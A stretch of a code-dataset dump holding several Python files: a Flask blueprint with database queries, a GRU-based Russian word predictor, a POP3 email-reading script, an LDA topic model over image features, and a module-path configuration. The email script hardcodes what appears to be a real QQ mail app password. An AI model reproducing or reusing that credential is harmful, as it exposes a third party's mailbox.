write_table=opts.write_table,\n pos_neg_ec=pos_neg_ec, rem_neg_ec=rem_neg_ec, ignore_ec=ignore_ec)\n", "sub_path": "src/igacat/go_term_prediction_examples/go_term_prediction_examples.py", "file_name": "go_term_prediction_examples.py", "file_ext": "py", "file_size_in_byte": 27573, "program_lang": "python", "lang": 
"en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "obonet.read_obo", "line_number": 31, "usage_type": "call"}, {"api_name": "networkx.is_directed_acyclic_graph", "line_number": 39, "usage_type": "call"}, {"api_name": "networkx.MultiDiGraph", "line_number": 51, "usage_type": "call"}, {"api_name": "networkx.weakly_connected_components", "line_number": 55, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 100, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 102, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 103, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 206, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 206, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 208, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 219, "usage_type": "call"}, {"api_name": "networkx.ancestors", "line_number": 220, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 238, "usage_type": "call"}, {"api_name": "networkx.reverse", "line_number": 242, "usage_type": "call"}, {"api_name": "networkx.ancestors", "line_number": 283, "usage_type": "call"}, {"api_name": "networkx.ancestors", "line_number": 285, "usage_type": "call"}, {"api_name": "networkx.ancestors", "line_number": 292, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 329, "usage_type": "call"}, {"api_name": "tqdm.tqdm.write", "line_number": 335, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 335, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 361, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 364, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 373, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 375, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 401, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 431, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 440, "usage_type": "call"}, {"api_name": "optparse.OptionParser", "line_number": 465, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 500, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 509, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 509, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 510, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 510, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 511, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 514, "usage_type": "call"}, {"api_name": "os.path", "line_number": 514, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 515, "usage_type": "call"}, {"api_name": "os.path", "line_number": 515, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 516, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 516, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 517, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 523, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 524, "usage_type": "attribute"}]} +{"seq_id": "557880080", "text": "from flask import Blueprint, render_template, url_for\nfrom flask import current_app as app\nfrom app.database import CursorFromConnectionPool\n\n#### ROBIDEX\nfrom sqlalchemy.sql 
import text, select\nfrom app.extensions import db\n\n### trying with straight psycopg2\n\n# 2.0 takes in arguments: variable=Blueprint('BlueprintName', __name__, etc....)\nbpill = Blueprint('bluepill', __name__, template_folder='templates', static_folder='static')\n\n@bpill.route('/')\ndef bluepillhome():\n return render_template('bluepill/index.html')\n\n@bpill.route('/test')\ndef test():\n \"\"\" blah blah\"\"\"\n return render_template('bluepill/index.html')\n\n@bpill.route('/database')\ndef db_test():\n list_status = ['Manhattan','Brooklyn','Queens','Bronx','Staten Island']\n default='Manhattan'\n with CursorFromConnectionPool() as cursor:\n cursor.execute(\"SELECT * FROM man_matview WHERE boro='1' AND block::numeric<=20\")\n fetched = cursor.fetchall()\n # if list_status = 'Manhattan':\n # cursor.execute(\"SELECT * FROM man_matview WHERE boro='1' AND block::numeric<=20\")\n # fetched = cursor.fetchall()\n # if list_status='Brooklyn':\n # cursor.execute(\"SELECT * FROM bk_matview WHERE boro='2' AND block::numeric<=20\")\n # fetched = cursor.fetchall()\n # return cls(boro=fetched[0], block=fetched[1], lot=fetched[2], buil_num=fetched[5], street_name=fetched[6])\n # return (boro=fetched[0], block=fetched[1])\n return render_template('bluepill/db_tests.html', list_status=list_status, default=default, fetched=fetched)\n # return render_template('bluepill/db_test.html', fetched=fetched, boro=boro)\n\n\n\"\"\" sqlalchemy.exc.ProgrammingError: (psycopg2.errors.UndefinedTable) relation \"man_matview\" does not exist\nLINE 1: SELECT * FROM man_matview WHERE boro='1' AND block='10' \nCreate Engine from scratch and pull data without \"\"\"\n# @bpill.route('/database')\n# def db_test():\n# sqltest = text(\n# \"SELECT * FROM man_matview WHERE boro='1' AND block='10'\"\n# )\n# db.session.execute(sqltest)\n# return render_template('bluepill.db_test.html',testdata=testdata, boro=boro, block=block, lot=lot, str_name=str_name)\n\n\n\n\n# @bpill.route('/database')\n# def db_test():\n# # sqltest = text(\n# # \"SELECT * FROM man_matview WHERE boro='1' AND block='10'\"\n# # )\n# with CursorFromConnectionPool as cursor:\n# cursor.execute(\"SELECT * FROM man_matview WHERE boro='1' AND block='10'\")\n# test_data=cursor.fetchall()\n# return cls(boro=test_data[1], block=test_data[2], lot=test_data[3], str_name=test_data[6])\n# return render_template('bluepill.db_test.html',testdata=testdata, boro=boro, block=block, lot=lot, str_name=str_name)\n\n# @app.route(\"/markup\")\n# def markup():\n# return Markup(\"
<h1>\n# Returned h1 Markup\n# </h1>\n#
    \")\n\n# # Need to work on JSON response. Check out \"Routing w/ Flask\"\n# @app.route(\"/makeresponse\", methods=['GET'])\n# def makeit():\n# if request.method != 'GET':\n# return make_response('Malformed request', 400)\n# my_dict = {'key': 'dictionary value'}\n# headers = {\"Content-Type\": \"application/json\"}\n# return make_response(jsonify(my_dict), 200, headers=headers)", "sub_path": "myapp/app/blueprints/bluepill/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3212, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "flask.Blueprint", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 21, "usage_type": "call"}, {"api_name": "app.database.CursorFromConnectionPool", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "336989036", "text": "import os\nimport time\nimport gensim\nimport pymorphy2\nimport numpy as np\nimport tensorflow as tf\nfrom keras_preprocessing.text import Tokenizer\nimport argparse\n\nparser = argparse.ArgumentParser(description='Generating sentences v0.01')\nparser.add_argument('word', metavar='word_to_predict', type=str, nargs='+',\n help='an integer for the accumulator')\nargs = parser.parse_args()\npredict_word = \"мишка\"\nprint(\"ARGS: %s\" %(args))\nif args.word:\n predict_word = args.word[0]\n\ntf.enable_eager_execution()\nfile_path = \"/home/neuron/dataset/small_linux.txt\"\nfile_path = \"G:\\\\New folder\\\\month-2011-12-qtraf_small\"\n\nload_word2vec_path = \"/home/neuron/dataset/model.bin\"\nload_word2vec_path = \"G:\\\\New folder\\\\ruwikiruscorpora_tokens_elmo_1024_2019\\\\ruwikiruscorpora_upos_skipgram_300_2_2019\\\\model.bin\"\n\n#Now we load \nmodel = gensim.models.KeyedVectors.load_word2vec_format(load_word2vec_path, binary=True)\nmodel.init_sims(replace=True)\nmorph = pymorphy2.MorphAnalyzer()\ncotags = {\n 'ADJF':'ADJ', # pymorphy2: word2vec \n 'ADJS' : 'ADJ', \n 'ADVB' : 'ADV', \n 'COMP' : 'ADV', \n 'GRND' : 'VERB', \n 'INFN' : 'VERB', \n 'NOUN' : 'NOUN', \n 'PRED' : 'ADV', \n 'PRTF' : 'ADJ', \n 'PRTS' : 'VERB', \n 'VERB' : 'VERB'\n}\n\ntext = open(file_path).read()\n \ntokenizer = Tokenizer()\ntokenizer.fit_on_texts([text])\n \nencoded = tokenizer.texts_to_sequences([text])[0]\n \nvocab_size = len(tokenizer.word_index) + 1\n \nword2idx = tokenizer.word_index\nidx2word = tokenizer.index_word\n\nsequences = list()\n\nfor i in range(1, len(encoded)):\n sequence = encoded[i - 1:i + 1]\n sequences.append(sequence)\nsequences = np.array(sequences)\n#print(word2idx)\nX, Y = sequences[:, 0], sequences[:, 1]\nX = np.expand_dims(X, 1)\nY = np.expand_dims(Y, 1)\n\nBUFFER_SIZE = 100\nBATCH_SIZE = 100\ndataset = tf.data.Dataset.from_tensor_slices((X, Y)).shuffle(BUFFER_SIZE)\ndataset = dataset.batch(BATCH_SIZE, drop_remainder=True)\n\nclass Model(tf.keras.Model):\n def __init__(self, vocab_size, embedding_dim, units, batch_size):\n super(Model, self).__init__()\n self.units = units\n self.batch_size = batch_size\n \n self.embedding = tf.keras.layers.Embedding(vocab_size, embedding_dim)\n \n self.gru = tf.keras.layers.GRU(self.units,\n return_sequences=True,\n return_state=True,\n recurrent_activation='sigmoid',\n recurrent_initializer='glorot_uniform')\n self.fc = tf.keras.layers.Dense(vocab_size)\n \n def call(self, inputs, hidden):\n inputs = 
self.embedding(inputs)\n #print(inputs)\n output, states = self.gru(inputs, initial_state=hidden)\n \n output = tf.reshape(output, (-1, output.shape[2]))\n \n x = self.fc(output)\n \n return x, states\n \n#This function returns only similar words that contains in train dataset\ndef sortSimilarListByDataset(words_list):\n ret_list = []\n for word in words_list:\n try:\n if word2idx[word]:\n ret_list.append(word)\n except KeyError:\n continue\n return ret_list\n#Returns Top N words, that similars with\ndef getSimilarsForWord(word, top=10):\n parsed = morph.parse(word)\n try:\n pos = cotags[parsed[0].tag.POS]\n except KeyError:\n return [word]\n gensim_find_word = word + \"_\" + pos\n most_similars = model.most_similar([gensim_find_word], topn=top)\n return_list = []\n for sim in most_similars:\n sim_parsed = sim[0].split(\"_\")\n if sim_parsed[1] == pos:\n return_list.append(sim_parsed[0])\n return return_list\n\n \nembedding_dim = 100\n \nunits = 2048\n \nkeras_model = Model(vocab_size, embedding_dim, units, BATCH_SIZE)\n\noptimizer = tf.train.AdamOptimizer()\n \n#checkpoint_dir = '.\\\\training_checkpoints_wordstat'\ncheckpoint_dir = '.\\\\training_checkpoints_wordstat_small2048'\n\ncheckpoint_prefix = os.path.join(checkpoint_dir, \"ckpt\")\ncheckpoint = tf.train.Checkpoint(optimizer=optimizer, model=keras_model)\n\ndef loss_function(labels, logits):\n return tf.losses.sparse_softmax_cross_entropy(labels=labels, logits=logits)\n\nEPOCHS = 10\n# for epoch in range(EPOCHS):\n# start = time.time()\n \n# hidden = keras_model.reset_states()\n \n# for (batch, (input, target)) in enumerate(dataset):\n# with tf.GradientTape() as tape:\n# predictions, hidden = keras_model(input, hidden)\n \n# target = tf.reshape(target, (-1,))\n# loss = loss_function(target, predictions)\n \n# grads = tape.gradient(loss, keras_model.variables)\n# optimizer.apply_gradients(zip(grads, keras_model.variables))\n \n# if batch % 100 == 0:\n# print('Epoch {} Batch {} Loss {:.4f}'.format(epoch + 1, batch, loss))\n \n# if (epoch + 1) % 10 == 0:\n# checkpoint.save(file_prefix=checkpoint_prefix)\n\ncheckpoint.restore(tf.train.latest_checkpoint(checkpoint_dir))\n#print(\"UNITS: %s\" %(units))\nhidden = [tf.zeros((1, units))]\n\n#Now we find similars for start word\nsimilar_words = getSimilarsForWord(predict_word, 10)\nsimilar_words.append(predict_word)\ndataset_words_list = sortSimilarListByDataset(similar_words)\n#print(\"dataset_words_list %s\" %(dataset_words_list))\n\nsequences_lists = [[word] for word in dataset_words_list]\n# sequences_list = [[word] for word in dataset_words_list]\n# sequences_lists = []\n# for i in range(5):\n# for elem in sequences_list:\n# sequences_lists.append(elem)\n\n#print(sequences_lists)\nfor sequence in sequences_lists:\n for i in range(1):\n input_eval = [word2idx[sequence[i]]]\n input_eval = tf.expand_dims(input_eval, 0) \n\n predictions, hidden = keras_model(input_eval, hidden)\n# print(\"PREDICTIONS\")\n# print(predictions)\n\n predicted_id = tf.argmax(predictions[-1]).numpy()\n\n sequence.append(idx2word[predicted_id])\n \nfor sequence in sequences_lists:\n print(\" \".join(sequence))", "sub_path": "from_scratch/word_prediction_run.py", "file_name": "word_prediction_run.py", "file_ext": "py", "file_size_in_byte": 6022, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "tensorflow.enable_eager_execution", "line_number": 19, 
"usage_type": "call"}, {"api_name": "gensim.models.KeyedVectors.load_word2vec_format", "line_number": 27, "usage_type": "call"}, {"api_name": "gensim.models", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pymorphy2.MorphAnalyzer", "line_number": 29, "usage_type": "call"}, {"api_name": "keras_preprocessing.text.Tokenizer", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 65, "usage_type": "call"}, {"api_name": "tensorflow.data.Dataset.from_tensor_slices", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 72, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Embedding", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 78, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.GRU", "line_number": 80, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 80, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 85, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 85, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 92, "usage_type": "call"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 131, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 131, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Checkpoint", "line_number": 137, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 137, "usage_type": "attribute"}, {"api_name": "tensorflow.losses.sparse_softmax_cross_entropy", "line_number": 140, "usage_type": "call"}, {"api_name": "tensorflow.losses", "line_number": 140, "usage_type": "attribute"}, {"api_name": "tensorflow.train.latest_checkpoint", "line_number": 164, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 164, "usage_type": "attribute"}, {"api_name": "tensorflow.zeros", "line_number": 166, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 185, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 191, "usage_type": "call"}]} +{"seq_id": "220761520", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom email.parser import Parser\nfrom email.header import decode_header\nfrom email.utils import parseaddr\n\nimport poplib\n\n# import email\n# 错误写法from email.message_from_string import message_from_string\nfrom email import message_from_string\n \n\n# 输入邮件地址, 口令和POP3服务器地址:\nemail = input('Email: ')\n# password = input('Password: ')\n# pop3_server = input('POP3 server: ')\npassword = 'mndbotrtnlqmdddh'\npop3_server = 'pop.qq.com'\n\ndef guess_charset(msg):\n charset = msg.get_charset()\n if charset is None:\n content_type = msg.get('Content-Type', '').lower()\n pos = content_type.find('charset=')\n if pos >= 0:\n charset = content_type[pos + 8:].strip()\n return charset\n\n#邮件的Subject或者Email中包含的名字都是经过编码后的str,要正常显示,就必须decode:\ndef decode_str(s):\n value, charset = decode_header(s)[0]\n if charset:\n value = value.decode(charset)\n return value\n\ndef print_info(msg, indent=0):\n if indent == 0:\n for header in ['From', 'To', 
'Subject']:\n value = msg.get(header, '')\n if value:\n if header=='Subject':\n value = decode_str(value)\n else:\n hdr, addr = parseaddr(value)\n name = decode_str(hdr)\n value = u'%s <%s>' % (name, addr)\n print('%s%s: %s' % (' ' * indent, header, value))\n if (msg.is_multipart()):\n parts = msg.get_payload()\n for n, part in enumerate(parts):\n print('%spart %s' % (' ' * indent, n))\n print('%s--------------------' % (' ' * indent))\n print_info(part, indent + 1)\n else:\n content_type = msg.get_content_type()\n if content_type=='text/plain' or content_type=='text/html':\n content = msg.get_payload(decode=True)\n charset = guess_charset(msg)\n if charset:\n content = content.decode(charset)\n print('%sText: %s' % (' ' * indent, content + '...'))\n else:\n print('%sAttachment: %s' % (' ' * indent, content_type))\n\n# 连接到POP3服务器:\n# server = poplib.POP3(pop3_server)\n# Error: b'-ERR Login fail. A secure connection is requiered(such as ssl). More information at http://service.mail.qq.com/cgi-bin/help?id=28'\nserver = poplib.POP3_SSL(pop3_server)\n# 可以打开或关闭调试信息:\nserver.set_debuglevel(1)\n# 可选:打印POP3服务器的欢迎文字:\nprint(server.getwelcome().decode('utf-8'))\n\ndef server_stat(server):\n # stat()返回邮件数量和占用空间:\n print('Messages: %s. Size: %s' % server.stat())\n # list()返回所有邮件的编号:\n resp, mails, octets = server.list()\n # 可以查看返回的列表类似[b'1 82923', b'2 2184', ...]\n print('mails>>',mails)\n\n # 获取最新一封邮件, 注意索引号从1开始:\n index = len(mails)#新邮件????????\n print('index>>',index)\n resp, lines, octets = server.retr(index)\n # lines存储了邮件的原始文本的每一行,\n # 可以获得整个邮件的原始文本:\n msg_content = b'\\r\\n'.join(lines).decode('utf-8')\n\n # 稍后解析出邮件:\n #!!!!Message对象本身可能是一个MIMEMultipart对象,即包含嵌套的其他MIMEBase对象,嵌套可能还不止一层\n msg = Parser().parsestr(msg_content)\n print_info(msg)\n\n # 可以根据邮件索引号直接从服务器删除邮件:\n # server.dele(index)\n\ndef email_message(server):\n # stat()返回邮件数量和占用空间:\n allemail = server.stat()\n print('Messages: %s. 
Size: %s' % allemail)\n\n # 参考https://blog.csdn.net/yatere/article/details/6654647 实际代码\n # 取出信件头部。注意:top指定的行数是以信件头为基数的,也就是说当取0行,\n # 其实是返回头部信息,取1行其实是返回头部信息之外再多1行。\n topemail = server.top(allemail[0], 0)\n emaillist = []\n\n\n # 参考https://blog.csdn.net/guogaoan/article/details/37034473\n # 提取当前收件箱中最新的一封邮件,由于邮件数据是经过编码的,这里我们依次尝试utf8、gbk、big5三种编码格 式进行解码,并提取邮件标题部分数据\n \n\n '''\n type=messageString.get_content_charset()\n #if type=='gb2312':\n # unicode(messageString.get_payload(),'gb2312')\n #if type=='shift_jis':\n # unicode(messageString.get_payload(),'shift_jis')\n #if type=='None':\n # unicode(messageString.get_payload(),'utf-8')\n '''\n for item in topemail[1]:\n try:\n emaillist.append(item.decode('utf8'))\n except Exception as e:\n try:\n emaillist.append(item.decode('gbk'))\n except Exception as e:\n emaillist.append(item.decode('big5'))\n emailmsg = message_from_string('\\n'.join(emaillist))\n emailsub = decode_header(emailmsg['subject'])\n # 其中emailsub通常包括两个信息,一个是编码后的标题文本数据,另一个 是其编码格式,所以我们还需要再进行一次解码,这时获得的才是真正可用的标题文本数据。\n if emailsub[0][1]:\n submsg = emailsub[0][0].decode(emailsub[0][1])\n else:\n submsg = emailsub[0][0]\n return submsg\n\ntry:\n # 身份认证:\n server.user(email)\n server.pass_(password)\nexcept Exception as e:\n print('Error:', e)\n # 幸好打印错误码,不然一脸懵逼\n # 参考https://blog.csdn.net/qq_41104478/article/details/78581400\n print('读取邮件登录失败') \n # exit()\nelse:\n # 如果没有错误发生,可以在except语句块后面加一个else\n # server_stat(server)\n submsg = email_message(server)\n print('submsg>>\\n',submsg)\n\n # 关闭连接:\n server.quit()\n print('server.quit')\nfinally:\n # except执行后,都会执行,\n # 执行完except后,如果有finally语句块,则执行finally语句块\n print('finally...')\n\n\n# def pop_connect(self):\n# try:\n# self.reademail = poplib.POP3_SSL(self._pop_server)\n# self.reademail.user(self._addr)\n# self.reademail.pass_(self._password)\n# self.allemail = self.reademail.stat()\n# except: print('读取邮件登录失败') exit()\n\n# def receive_email(self):\n# self.pop_connect()\n# topemail = self.reademail.top(self.allemail[0], 0)\n# emaillist = []\n# for item in topemail[1]:\n# try:\n# emaillist.append(item.decode('utf8'))\n# except: try:\n# emaillist.append(item.decode('gbk'))\n# except:\n# emaillist.append(item.decode('big5'))\n# emailmsg = email.message_from_string('\\n'.join(emaillist))\n# emailsub = email.header.decode_header(emailmsg['subject'])\n# if emailsub[0][1]:\n# submsg = emailsub[0][0].decode(emailsub[0][1])\n# else:\n# submsg = emailsub[0][0]\n# return submsg\n\n\n\n", "sub_path": "shutdowmemail/recevie_test.py", "file_name": "recevie_test.py", "file_ext": "py", "file_size_in_byte": 7006, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "email.parser", "line_number": 16, "usage_type": "name"}, {"api_name": "email.header.decode_header", "line_number": 33, "usage_type": "call"}, {"api_name": "email.utils.parseaddr", "line_number": 46, "usage_type": "call"}, {"api_name": "poplib.POP3_SSL", "line_number": 70, "usage_type": "call"}, {"api_name": "email.parser.Parser", "line_number": 94, "usage_type": "call"}, {"api_name": "email.message_from_string", "line_number": 133, "usage_type": "call"}, {"api_name": "email.header.decode_header", "line_number": 134, "usage_type": "call"}, {"api_name": "email.parser", "line_number": 144, "usage_type": "argument"}]} +{"seq_id": "266932094", "text": "\n# coding: utf-8\n\n# In[1]:\n\n\n'''####### '''\n\n\n# In[2]:\n\n\nimport numpy as np\nimport pickle\n#import operator\nimport matplotlib.pyplot as plt\nimport matplotlib.image 
as mpimg\nfrom gensim import corpora, models\n\n\n# In[3]:\n\n\ndataset = 'imagenet'\npercentileset = 'imagenet'\n\nimage_fc7 = np.load('data/' + dataset + '_fc7.npy') ######### dataset fc7\npercentile_fc7 = np.load('data/' + percentileset + '_percentile_fc7.npy')\n# Load image id list\nimg_list = np.load('data/' + dataset + '_raw_image_list.npy') ######### dataset image list\n\n\n# In[4]:\n\n\nbinary_vector_fc7 = np.greater(image_fc7, percentile_fc7).astype(int) ###########\n\n\n# In[5]:\n\n\nprint(\"Data shape: \", binary_vector_fc7.shape)\nprint(\"Number of 1s: \", np.sum(binary_vector_fc7 == 1))\nprint(\"Number of 0s: \", np.sum(binary_vector_fc7 == 0))\nprint(\"Anomailes: \",np.sum([binary_vector_fc7 < 0]))\n\n\n# In[6]:\n\n\n# Define parameters for topic modelling\nnum_topics = [10, 20, 50]\nnum_words = 4096 # Number of top features to be displayed per topic\nnum_images = binary_vector_fc7.shape[0]\n\n\n# In[7]:\n\n\n# Prepare for corpus\ncorpus_fc7 = [[(j, binary_vector_fc7[i, j]) for j in range(num_words) if binary_vector_fc7[i, j]==1] for i in range(num_images)]\ncorpora.MmCorpus.serialize('data/corpus_fc7.mm', corpus_fc7)\n\n# Load corpus\ncorpus = corpora.MmCorpus('data/corpus_fc7.mm')\nprint(corpus[:2])\n\n\n# In[8]:\n\n\nfor K in num_topics:\n # Create the Topic Model\n model_name = str(K) + '-topics.model'\n lda = models.ldamodel.LdaModel(corpus, num_topics = K)\n lda.save('data/' + model_name)\n\n # Get topic for each image\n img_by_topic = [[] for _ in range(K)]\n for i in range(num_images):\n ind, val = sorted(lda.get_document_topics(corpus[i]), key=lambda x:x[1])[-1]\n img_by_topic[ind].append((i, val))\n\n for j in range(K):\n img_by_topic[j].sort(key = lambda x: -x[1])\n\n # Save results\n with open(\"data/\" + str(K) + \"-topic-res-fc7.txt\", \"wb\") as fp:\n pickle.dump(img_by_topic, fp)\n\n# # Or load the saved model\n# ldamodel = gensim.models.ldamodel.LdaModel.load(\"../2 topics/\"+model_name)\n\n\n# In[9]:\n\n\nfor K in num_topics:\n with open(\"data/\" + str(K) + \"-topic-res-fc7.txt\", \"rb\") as fp:\n img_by_topic = pickle.load(fp) \n \n top_list = range(K)\n for topic in top_list:\n fig, ax = plt.subplots(nrows=5, ncols=5, dpi=160)\n fig.subplots_adjust(left=None, bottom=None, right=None, top=None, wspace=None, hspace=0.3)\n fig.suptitle(str(K)+' Topics: Topic '+str(topic+1))\n i = 0\n try:\n for row in ax:\n for col in row:\n I = img_list[img_by_topic[topic][i][0]]\n i += 1\n col.axis('off')\n col.imshow(I)\n col.set_title(i, fontsize=5)\n col.imshow(I) \n plt.show() \n except:\n print ('No samples in current topic')\n\n", "sub_path": "fc7 - topic 10 20 50.py", "file_name": "fc7 - topic 10 20 50.py", "file_ext": "py", "file_size_in_byte": 2949, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.load", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.greater", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 45, "usage_type": "call"}, {"api_name": "gensim.corpora.MmCorpus.serialize", "line_number": 62, "usage_type": "call"}, {"api_name": "gensim.corpora.MmCorpus", "line_number": 62, "usage_type": "attribute"}, {"api_name": "gensim.corpora", "line_number": 62, 
"usage_type": "name"}, {"api_name": "gensim.corpora.MmCorpus", "line_number": 65, "usage_type": "call"}, {"api_name": "gensim.corpora", "line_number": 65, "usage_type": "name"}, {"api_name": "gensim.models.ldamodel.LdaModel", "line_number": 75, "usage_type": "call"}, {"api_name": "gensim.models.ldamodel", "line_number": 75, "usage_type": "attribute"}, {"api_name": "gensim.models", "line_number": 75, "usage_type": "name"}, {"api_name": "pickle.dump", "line_number": 89, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}]} +{"seq_id": "257315931", "text": "import torch\nimport torch.nn.functional\n\nfrom deeplodocus.utils import get_main_path\nimport deeplodocus.data.transforms as tfm\n\n\nDEEP_MODULE_OPTIMIZERS = {\"pytorch\":\n {\"path\" : torch.optim.__path__,\n \"prefix\" : torch.optim.__name__},\n \"custom\":\n {\"path\": [get_main_path() + \"/modules/optimizers\"],\n \"prefix\": \"modules.optimizers\"}\n }\n\nDEEP_MODULE_MODELS = {\"custom\":\n {\"path\": [get_main_path() + \"/modules/models\"],\n \"prefix\": \"modules.models\"}\n }\n\nDEEP_MODULE_LOSSES = {\"pytorch\":\n {\"path\" : torch.nn.__path__,\n \"prefix\" : torch.nn.__name__},\n \"custom\":\n {\"path\": [get_main_path() + \"/modules/losses\"],\n \"prefix\": \"modules.losses\"}\n }\n\nDEEP_MODULE_METRICS = {\"pytorch\":\n {\"path\" : torch.nn.__path__,\n \"prefix\" : torch.nn.__name__},\n \"custom\":\n {\"path\": [get_main_path() + \"/modules/metrics\"],\n \"prefix\": \"modules.metrics\"}\n }\n\nDEEP_MODULE_TRANSFORMS = {\"deeplodocus\":\n {\"path\" : tfm.__path__,\n \"prefix\" : tfm.__name__},\n \"custom\":\n {\"path\": [get_main_path() + \"/modules/transforms\"],\n \"prefix\": \"modules.transforms\"}\n }", "sub_path": "deeplodocus/utils/flags/module.py", "file_name": "module.py", "file_ext": "py", "file_size_in_byte": 1742, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "torch.optim", "line_number": 9, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 10, "usage_type": "attribute"}, {"api_name": "deeplodocus.utils.get_main_path", "line_number": 12, "usage_type": "call"}, {"api_name": "deeplodocus.utils.get_main_path", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "attribute"}, {"api_name": "deeplodocus.utils.get_main_path", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 30, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 31, "usage_type": "attribute"}, {"api_name": "deeplodocus.utils.get_main_path", "line_number": 33, "usage_type": "call"}, {"api_name": "deeplodocus.data.transforms.__path__", "line_number": 38, "usage_type": "attribute"}, {"api_name": "deeplodocus.data.transforms", "line_number": 38, "usage_type": "name"}, {"api_name": "deeplodocus.data.transforms.__name__", "line_number": 39, "usage_type": "attribute"}, {"api_name": "deeplodocus.data.transforms", "line_number": 39, "usage_type": "name"}, {"api_name": "deeplodocus.utils.get_main_path", "line_number": 41, "usage_type": "call"}]} 
